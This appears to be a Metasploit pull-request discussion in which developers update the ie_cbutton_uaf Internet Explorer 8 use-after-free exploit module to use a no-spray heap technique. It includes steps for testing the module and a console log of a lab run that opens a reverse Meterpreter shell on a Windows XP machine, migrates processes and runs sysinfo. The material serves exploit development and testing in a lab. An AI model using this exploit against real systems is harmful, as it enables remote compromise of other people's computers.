Uses js_mstime_malloc to do the no-spray technique

[wchen-r7]

Now that we have a js_mstime_malloc, we should use that (see #1785). This module serves as our first example.

To test this: Fire up msfconsole, use exploit/windows/browser/ie_cbutton_uaf, set meterpreter as payload, run it against a Windows XP SP3 box with IE 8 on it.

[jvazquez-r7]

+1 ! Merging!

msf exploit(ie_cbutton_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.6:4444 
[*] Using URL: http://0.0.0.0:8080/BJqM0M4j
[*]  Local IP: http://192.168.0.6:8080/BJqM0M4j
[*] Server started.
msf exploit(ie_cbutton_uaf) > [*] 192.168.0.6      ie_cbutton_uaf - Requesting: /BJqM0M4j
[*] 192.168.0.6      ie_cbutton_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.0.6      ie_cbutton_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 1 opened (192.168.0.6:4444 -> 192.168.0.6:49905) at 2013-05-02 19:39:47 -0500
[*] Session ID 1 (192.168.0.6:4444 -> 192.168.0.6:49905) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1144)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2068
[+] Successfully migrated to process 

msf exploit(ie_cbutton_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.0.6 - Meterpreter session 1 closed.  Reason: User exit